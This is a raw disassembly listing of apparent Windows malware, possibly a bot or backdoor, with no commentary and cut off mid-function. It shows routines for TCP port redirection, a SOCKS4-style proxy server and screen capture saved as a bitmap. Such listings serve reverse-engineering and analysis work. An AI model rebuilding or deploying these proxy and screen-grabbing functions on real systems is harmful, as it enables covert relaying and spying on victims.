var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_43F6A8 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_43C848[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_407252
push 8
call sub_416FA2
add esp, 150h
cmp eax, ebx
jnz short loc_407A4D
mov esi, offset dword_43D7E8
push esi
call ds:dword_4240D0 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4240CC ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_407A4D
lea eax, [ebp+var_1CC]
push offset unk_42B4F0
push eax
call sub_4172AE
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_407A37
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40D679
add esp, 14h
loc_407A37: ; CODE XREF: sub_40797F+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_407A4D: ; CODE XREF: sub_40797F+63�j
; sub_40797F+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_424064
mov edi, ebx
mov ds:dword_43C84C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_407B1A
loc_407A6B: ; CODE XREF: sub_40797F+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B4A8
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_416D5A
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov ds:dword_4450C4[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_407767
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_407AE5
loc_407ADA: ; CODE XREF: sub_40797F+164�j
cmp [ebp+var_4], ebx
jnz short loc_407B0C
push 1Eh
call esi ; Sleep
jmp short loc_407ADA
; ---------------------------------------------------------------------------
loc_407AE5: ; CODE XREF: sub_40797F+159�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B45C
push eax
call sub_4172AE
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
add esp, 10h
loc_407B0C: ; CODE XREF: sub_40797F+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_407A6B
loc_407B1A: ; CODE XREF: sub_40797F+E6�j
cmp [ebp+var_30], ebx
jz loc_407BC4
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_407B2F: ; CODE XREF: sub_40797F+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_43C848[eax*8]
push eax
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B408
push eax
call sub_4172AE
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_407B7D
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40D679
add esp, 14h
loc_407B7D: ; CODE XREF: sub_40797F+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov ds:dword_43C84C[eax*8], ebx
call esi ; Sleep
push 8
call sub_416FA2
cmp eax, 1
pop ecx
jnz short loc_407BB4
push offset dword_43D7E8
call ds:dword_4240D0 ; RtlDeleteCriticalSection
loc_407BB4: ; CODE XREF: sub_40797F+228�j
push [ebp+var_2C]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_407BC4: ; CODE XREF: sub_40797F+19E�j
; sub_40797F+25D�j
mov eax, [ebp+var_2C]
cmp ds:dword_43C84C[eax*8], 1
jnz loc_407B2F
push 7D0h
call esi ; Sleep
jmp short loc_407BC4
sub_40797F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BDE proc near ; DATA XREF: sub_40EE72+36DD�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call ds:dword_43F668 ; htons
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call ds:dword_43F6E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407D42
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov ds:dword_4450CC[eax], ebx
call ds:dword_43F584 ; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43F694 ; bind
test eax, eax
jnz loc_407D42
push 0Ah
push ebx
call ds:dword_43F690 ; listen
test eax, eax
jnz loc_407D42
loc_407C88: ; CODE XREF: sub_407BDE+BE�j
; sub_407BDE+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_43F6FC ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_407C88
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset unk_42B584
push eax
call sub_4172AE
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_416D5A
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_4450C4[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_407D66
push esi
push esi
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_4450D4[ecx], eax
jz short loc_407D2D
loc_407D1A: ; CODE XREF: sub_407BDE+14D�j
cmp [ebp+var_2C], esi
jnz loc_407C88
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_407D1A
; ---------------------------------------------------------------------------
loc_407D2D: ; CODE XREF: sub_407BDE+13A�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_42B538
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_407D45
; ---------------------------------------------------------------------------
loc_407D42: ; CODE XREF: sub_407BDE+61�j
; sub_407BDE+93�j ...
mov edi, [ebp+arg_0]
loc_407D45: ; CODE XREF: sub_407BDE+162�j
push edi
call ds:dword_43F700 ; closesocket
push ebx
call ds:dword_43F700 ; closesocket
push [ebp+var_3C]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_407BDE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D66 proc near ; DATA XREF: sub_407BDE+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call ds:dword_43F6E8 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_407F1C
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_43F668 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_407DF6
lea eax, [ebp+var_13C]
push eax
call ds:dword_43F6EC ; gethostbyname
jmp short loc_407E04
; ---------------------------------------------------------------------------
loc_407DF6: ; CODE XREF: sub_407D66+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_43F620 ; gethostbyaddr
loc_407E04: ; CODE XREF: sub_407D66+8E�j
cmp eax, edi
jz loc_407F1C
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz loc_407F1C
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_42B62C
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_416D5A
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_4450CC[ebx]
mov ds:dword_4450C4[eax], ecx
add esp, 20h
mov ecx, [esi]
mov ds:dword_4450D0[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_407F4D
push edi
push edi
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov ds:dword_4450D4[ecx], eax
jz short loc_407F09
loc_407EB6: ; CODE XREF: sub_407D66+15D�j
cmp [ebp+var_20], edi
jnz short loc_407EC5
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_407EB6
; ---------------------------------------------------------------------------
loc_407EC5: ; CODE XREF: sub_407D66+153�j
mov ebx, 1000h
loc_407ECA: ; CODE XREF: sub_407D66+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_43F680 ; recv
cmp eax, edi
jle short loc_407F1C
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407ECA
jmp short loc_407F1C
; ---------------------------------------------------------------------------
loc_407F09: ; CODE XREF: sub_407D66+14E�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_42B5DC
call sub_40BFE1
pop ecx
pop ecx
loc_407F1C: ; CODE XREF: sub_407D66+44�j
; sub_407D66+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push ds:dword_4450CC[eax]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call ds:dword_43F700 ; closesocket
push [ebp+var_4]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_407D66 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F4D proc near ; DATA XREF: sub_407D66+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_417B30
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_407F84: ; CODE XREF: sub_407F4D+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push ds:dword_4450D0[esi]
call ds:dword_43F680 ; recv
test eax, eax
jle short loc_407FCB
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push ds:dword_4450CC[esi]
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407F84
loc_407FCB: ; CODE XREF: sub_407F4D+61�j
push ds:dword_4450D0[esi]
call ds:dword_43F700 ; closesocket
push [ebp+var_14]
call sub_417076
pop ecx
push 0
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_407F4D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FEA proc near ; DATA XREF: sub_40EE72+5E4F�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call ds:dword_43F668 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call ds:dword_43F6E8 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov ds:dword_4450CC[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_43F694 ; bind
test eax, eax
jnz loc_40818C
push 0Ah
push edi
call ds:dword_43F690 ; listen
test eax, eax
jnz loc_40818C
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B75C
push eax
call sub_4172AE
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_4080C5
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40D679
add esp, 14h
loc_4080C5: ; CODE XREF: sub_407FEA+B9�j
; sub_407FEA+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_43F6FC ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B708
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_416D5A
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_4450C4[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_4081EF
push esi
push esi
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_4450D4[ecx], eax
jz short loc_40816C
loc_408159: ; CODE XREF: sub_407FEA+180�j
cmp [ebp+var_28], esi
jnz loc_4080C5
push 5
call ds:dword_424064 ; Sleep
jmp short loc_408159
; ---------------------------------------------------------------------------
loc_40816C: ; CODE XREF: sub_407FEA+16D�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B6C0
push eax
call sub_4172AE
add esp, 0Ch
jmp loc_4080C5
; ---------------------------------------------------------------------------
loc_40818C: ; CODE XREF: sub_407FEA+7B�j
; sub_407FEA+8C�j
push edi
call ds:dword_43F700 ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset unk_42B680
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4081CF
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40D679
add esp, 14h
loc_4081CF: ; CODE XREF: sub_407FEA+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_40BF6D
push [ebp+var_3C]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_407FEA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081EF proc near ; DATA XREF: sub_407FEA+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_4450CC[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call ds:dword_43F650 ; select
test eax, eax
jnz short loc_408270
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_408270: ; CODE XREF: sub_4081EF+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call ds:dword_43F680 ; recv
test eax, eax
jg short loc_4082A1
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_4082A1: ; CODE XREF: sub_4081EF+98�j
cmp [ebp+var_4D0], 4
jnz loc_40849B
cmp [ebp+var_4CF], 1
jnz loc_40849B
cmp [ebp+var_44], bl
jz short loc_408337
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_408337
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset unk_42B830
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_417330
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43F6B8 ; send
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_408337: ; CODE XREF: sub_4081EF+CF�j
; sub_4081EF+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_417330
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call ds:dword_43F6E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4083CF
call ds:dword_43F5FC ; WSAGetLastError
push eax
push offset unk_42B7E4
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417330
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43F6B8 ; send
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_4083CF: ; CODE XREF: sub_4081EF+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40843E
call ds:dword_43F5FC ; WSAGetLastError
push eax
push offset unk_42B794
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417330
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43F6B8 ; send
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_40843E: ; CODE XREF: sub_4081EF+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43F6B8 ; send
push dword ptr [esi]
push edi
call sub_4084B3
pop ecx
pop ecx
push edi
call ds:dword_43F700 ; closesocket
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_40849B: ; CODE XREF: sub_4081EF+B9�j
; sub_4081EF+C6�j
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
sub_4081EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084B3 proc near ; CODE XREF: sub_4081EF+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4084C9: ; CODE XREF: sub_4084B3+C5�j
; sub_4084B3+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4084E1: ; CODE XREF: sub_4084B3+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4084F1
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4084E1
loc_4084F1: ; CODE XREF: sub_4084B3+33�j
cmp ecx, 1
jnz short loc_408506
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_408506: ; CODE XREF: sub_4084B3+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call ds:dword_43F650 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call ds:dword_43F560 ; __WSAFDIsSet
test eax, eax
jz short loc_408566
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
loc_408566: ; CODE XREF: sub_4084B3+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call ds:dword_43F560 ; __WSAFDIsSet
test eax, eax
jz loc_4084C9
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call ds:dword_43F680 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4084C9
loc_4085AE: ; CODE XREF: sub_4084B3+9A�j
; sub_4084B3+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4084B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085B3 proc near ; CODE XREF: sub_40EE72+45AF�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_43F654 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_4087E7
push 8
push edi
call ds:dword_43F670 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call ds:dword_43F670 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call ds:dword_43F670 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_408615
push 18h
push edi
call ds:dword_43F670 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_408617
; ---------------------------------------------------------------------------
loc_408615: ; CODE XREF: sub_4085B3+50�j
xor ebx, ebx
loc_408617: ; CODE XREF: sub_4085B3+60�j
push edi
call ds:dword_43F6B4 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_4087CC
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call ds:dword_43F6AC ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_4087D7
push eax
push [ebp+var_4]
call ds:dword_43F544 ; SelectObject
cmp eax, esi
jz loc_4087D7
cmp eax, 0FFFFFFFFh
jz loc_4087D7
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call ds:dword_43F6B0 ; BitBlt
test eax, eax
jz loc_4087D7
cmp ebx, esi
jz short loc_4086D4
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call ds:dword_43F598 ; GetDIBColorTable
mov ebx, eax
loc_4086D4: ; CODE XREF: sub_4085B3+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
